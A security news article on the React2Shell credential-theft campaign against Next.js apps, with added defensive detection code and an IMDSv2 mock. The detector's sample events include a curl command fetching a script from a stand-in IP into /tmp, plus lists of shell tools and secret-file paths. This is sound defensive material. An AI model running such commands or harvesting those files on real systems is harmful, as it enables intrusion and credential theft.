Hackers Exploit React2Shell in Automated Credential Theft Campaign
Attackers are exploiting the React2Shell flaw (CVE-2025-55182) in unpatched Next.js applications to run a large-scale, automated credential theft operation that has compromised at least 766 hosts across multiple cloud providers. On each victim they deploy a script that harvests environment variables, API keys, database and cloud credentials, SSH keys, Kubernetes tokens, Docker data, shell command history and process information, then exfiltrates it over HTTP to a command-and-control (C2) server running the Nexus Listener framework. Cisco Talos attributes the activity to the threat cluster UAT-10608 and warns that the stolen secrets enable cloud account takeover, lateral movement, supply chain attacks and regulatory exposure. Immediate remediation includes patching React2Shell, rotating every credential that was reachable from the affected hosts, enforcing IMDSv2, enabling secret scanning, deploying WAF/RASP protection in front of Next.js, and applying least-privilege controls.

A large-scale intrusion campaign has been uncovered that uses the React2Shell vulnerability (CVE-2025-55182) to break into vulnerable Next.js applications automatically and harvest credentials. The operation is highly automated and targets a broad set of cloud-hosted environments: within a single day the attackers compromised at least 766 hosts across multiple cloud providers and regions and collected a wide range of sensitive data.
Central to the campaign is a framework known as Nexus Listener. Once a vulnerable Next.js instance is found, an automated script is dropped into the system's temporary directory. The script runs a multi-phase credential-harvesting routine that extracts secrets from the compromised environment and sends them to a command-and-control (C2) server running the Nexus Listener component, where operators can inspect the results with built-in search, filters and statistics.
Cisco Talos researchers track the operators behind the activity as the threat cluster UAT-10608. Their investigation found an exposed Nexus Listener instance that was itself accessible and exploitable, which let them observe the data being harvested and how the listener's web application managed its internal processes. Screenshots of the operation, such as the Nexus Listener dashboard, show the scope of the campaign, including the uptime of the harvesting framework and the aggregate tally of each credential type taken from compromised hosts.
Automated secret harvesting begins with scanning for vulnerable Next.js deployments. When a target is found, the React2Shell exploit plants the harvesting routine. The exfiltrated data spans a broad spectrum of sensitive information: environment variables and secrets (API keys, database credentials, and GitHub/GitLab tokens), SSH private keys, cloud credentials (AWS/GCP/Azure instance metadata and IAM credentials), Kubernetes tokens, Docker/container details, command history, and broader process and runtime data. It is sent in chunks over HTTP to port 8080 on the C2 server, where the attackers view and analyze it.
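The chain described in the two paragraphs above (a Next.js server process spawning a shell, a script staged in the temp directory, reads of secret files, chunked HTTP to port 8080) is what a host-level detection should correlate rather than alert on any single step. The following is an added example, not code from the Talos report or from the campaign: it walks a constructed process/file/network event feed, groups suspicious stages under the web-server process they descend from, and reports only trees that show at least two stages. The event schema, the process names in WEB_PROCS and SHELLS, the secret-file paths and the sample IP 198.51.100.23 are all assumptions for the example.

```python
"""Detection heuristics for the host-side chain described above: a Next.js (node)
process spawns a shell, stages a script in the temp directory, reads secret files
and posts them over HTTP to a remote port 8080. The event records below are
constructed to resemble a generic process/file/network telemetry feed (auditd or
an eBPF agent); they are not data from the Talos report."""

from dataclasses import dataclass
from typing import Dict, List, Optional

WEB_PROCS = {"node", "next-server"}          # the exploited Next.js server process (assumed names)
SHELLS = {"sh", "bash", "dash", "python3", "curl", "wget"}
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# File locations the campaign is reported to harvest (usual paths; assumed, not quoted).
SECRET_MARKERS = ("/.env", "/.ssh/", "/.aws/credentials", "/.kube/config",
                  "/.docker/config.json", "/.git-credentials", "_history")
C2_PORT = 8080                                # port reported for the chunked HTTP exfil


@dataclass
class Event:
    kind: str        # "exec", "open" or "connect"
    pid: int
    ppid: int
    comm: str        # process name
    detail: str      # exec: argv line; open: file path; connect: "host:port"


def web_root(procs: Dict[int, Event], pid: int) -> Optional[int]:
    """Nearest ancestor of pid (excluding pid itself) that is a web-server process."""
    seen = set()
    cur = procs[pid].ppid if pid in procs else None
    while cur in procs and cur not in seen:
        seen.add(cur)
        if procs[cur].comm in WEB_PROCS:
            return cur
        cur = procs[cur].ppid
    return None


def detect(events: List[Event], min_stages: int = 2) -> Dict[int, Dict[str, List[str]]]:
    """Group suspicious stages under the web process they descend from.
    Returns {web_pid: {stage: [details...]}} for trees showing >= min_stages stages."""
    procs: Dict[int, Event] = {}
    stages: Dict[int, Dict[str, List[str]]] = {}

    def mark(root: int, stage: str, ev: Event) -> None:
        stages.setdefault(root, {}).setdefault(stage, []).append(ev.detail)

    for ev in events:
        if ev.kind == "exec":
            procs[ev.pid] = ev
        root = web_root(procs, ev.pid)
        if root is None:
            continue      # not a child of the web app; the app reading its own .env is normal
        if ev.kind == "exec":
            if ev.comm in SHELLS:
                mark(root, "spawn_shell", ev)
            if any(tok.startswith(TEMP_DIRS) for tok in ev.detail.split()):
                mark(root, "temp_stage", ev)
        elif ev.kind == "open" and any(m in ev.detail for m in SECRET_MARKERS):
            mark(root, "secret_read", ev)
        elif ev.kind == "connect":
            host, _, port = ev.detail.rpartition(":")
            if port == str(C2_PORT) and not host.startswith(("127.", "::1")):
                mark(root, "c2_post", ev)
    return {r: s for r, s in stages.items() if len(s) >= min_stages}


# Constructed sample: pid 100 is the exploited app, pid 200 a healthy instance.
SAMPLE_EVENTS = [
    Event("exec", 100, 1, "node", "node server.js"),
    Event("exec", 101, 100, "sh", "sh -c curl -s http://198.51.100.23:8080/s -o /tmp/.n.sh"),
    Event("exec", 102, 101, "bash", "bash /tmp/.n.sh"),
    Event("open", 102, 101, "bash", "/app/.env"),
    Event("open", 102, 101, "bash", "/root/.ssh/id_ed25519"),
    Event("open", 102, 101, "bash", "/root/.kube/config"),
    Event("connect", 102, 101, "bash", "198.51.100.23:8080"),
    Event("exec", 200, 1, "node", "node server.js"),
    Event("open", 200, 1, "node", "/app/.env"),          # app loading its own config
    Event("connect", 200, 1, "node", "127.0.0.1:8080"),  # local upstream, not exfil
]

if __name__ == "__main__":
    for root, hit in detect(SAMPLE_EVENTS).items():
        print(f"web pid {root}: {sorted(hit)}")
```

A Next.js deployment may legitimately talk to port 8080 (an upstream API or a sidecar), and the server process reads its own .env at startup, so neither signal is actionable alone; the lineage check is what separates the harvester from the application. Adjust WEB_PROCS to the process name your telemetry actually records for the server, and expect the port and temp paths to change between campaigns.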
According to the reporting, the attack’s scale was notable: 766 hosts compromised within a single 24-hour period. The campaign’s data collection aims to enable cloud account takeover, access to databases and payment systems, and even lateral movement within networks via SSH keys. In addition to the operational risks, the exposure of personal data among the stolen secrets carries potential privacy and regulatory implications for affected organizations.
The campaign's workflow also shows that the attackers could parse and summarize the harvested data: a listing of compromised hosts, counts by credential type, and the framework's uptime, all suggesting a mature, self-service interface intended to maximize extraction efficiency. The combination of automated exploitation, centralized data aggregation, and a scalable harvesting framework underscores the growing threat of automated credential theft against modern web applications built with Next.js.
As the security community continues to map the UAT-10608 operation, the focus remains on understanding how such tools are deployed, how they locate exposed targets, and how dashboards like Nexus Listener facilitate rapid data collection and analysis. The incident highlights the persistence of credential-stealing campaigns in cloud-centric environments and the ongoing importance of monitoring, timely patching, and robust credential hygiene to reduce exposure to vulnerabilities like React2Shell.
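The summary at the top lists "enforcing IMDSv2" among the immediate remediations; the reason it matters for this campaign is that a harvester collecting "AWS metadata and IAM credentials" from inside the compromised instance typically does a single unauthenticated GET against the metadata service, the IMDSv1 pattern. The block below is an added example, not AWS code and not the campaign's script: it runs a loopback mock of the metadata service under both HttpTokens settings and shows that the plain GET is refused once tokens are required while the PUT-then-GET token flow still works. The header names and paths are the documented IMDSv2 ones; the role name app-role and the credential values are constructed.

```python
"""Mock of EC2 instance metadata (IMDS) behaviour under HttpTokens=optional versus
required, to show why the 'enforce IMDSv2' remediation matters for this campaign:
a harvesting script that simply GETs the IAM credential path (the IMDSv1 pattern)
succeeds only when tokens are optional. Added, self-contained example; it is not
AWS code and not the campaign's script. Header names and paths are the documented
IMDSv2 ones; the role name and credential values are constructed."""

import json
import secrets
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

TOKEN_PATH = "/latest/api/token"
CRED_PATH = "/latest/meta-data/iam/security-credentials/app-role"   # role name assumed
FAKE_CREDS = {"AccessKeyId": "AKIAEXAMPLEONLY00000",                 # constructed values
              "SecretAccessKey": "not-a-real-secret", "Token": "not-a-real-session-token"}


class MockIMDS(BaseHTTPRequestHandler):
    require_tokens = False   # stands in for the instance's HttpTokens setting
    tokens = set()           # issued session tokens (class-level, shared by handlers)

    def log_message(self, *args):   # silence per-request logging
        pass

    def do_PUT(self):
        ttl = self.headers.get("X-aws-ec2-metadata-token-ttl-seconds")
        if self.path != TOKEN_PATH or ttl is None:
            return self._send(400, "bad request")
        token = secrets.token_urlsafe(16)
        self.tokens.add(token)
        self._send(200, token)

    def do_GET(self):
        token = self.headers.get("X-aws-ec2-metadata-token")
        if token is None and self.require_tokens:
            return self._send(401, "IMDSv2 required")    # refuses the plain-GET harvester
        if token is not None and token not in self.tokens:
            return self._send(401, "invalid token")
        if self.path == CRED_PATH:
            return self._send(200, json.dumps(FAKE_CREDS))
        self._send(404, "not found")

    def _send(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


def _request(url, method="GET", headers=None):
    req = urllib.request.Request(url, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def harvester_get(base):
    """The IMDSv1 pattern an automated harvester uses: one unauthenticated GET."""
    return _request(base + CRED_PATH)[0]


def imdsv2_get(base):
    """IMDSv2: PUT for a session token, then GET with the token header."""
    code, token = _request(base + TOKEN_PATH, "PUT",
                           {"X-aws-ec2-metadata-token-ttl-seconds": "60"})
    if code != 200:
        return code
    return _request(base + CRED_PATH, headers={"X-aws-ec2-metadata-token": token})[0]


def run_scenario(require_tokens):
    """Serve the mock on a loopback port with the given policy; return status codes."""
    MockIMDS.require_tokens = require_tokens
    MockIMDS.tokens = set()
    server = HTTPServer(("127.0.0.1", 0), MockIMDS)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d" % server.server_address[1]
    try:
        return {"v1_get": harvester_get(base), "v2_get": imdsv2_get(base)}
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("HttpTokens=optional:", run_scenario(False))   # {'v1_get': 200, 'v2_get': 200}
    print("HttpTokens=required:", run_scenario(True))    # {'v1_get': 401, 'v2_get': 200}
```

On a real instance the equivalent setting is applied with `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-put-response-hop-limit 1`. Two caveats a practitioner should keep in mind: an attacker who already has code execution on the host can perform the PUT as well, so `required` on its own mainly defeats GET-only harvesters and SSRF-style access; the hop limit of 1 is what stops the token response from crossing into a container that has its own network namespace, which is where a Next.js process usually runs. Workloads that legitimately need cloud credentials should receive them through a workload-identity mechanism rather than by raising the hop limit.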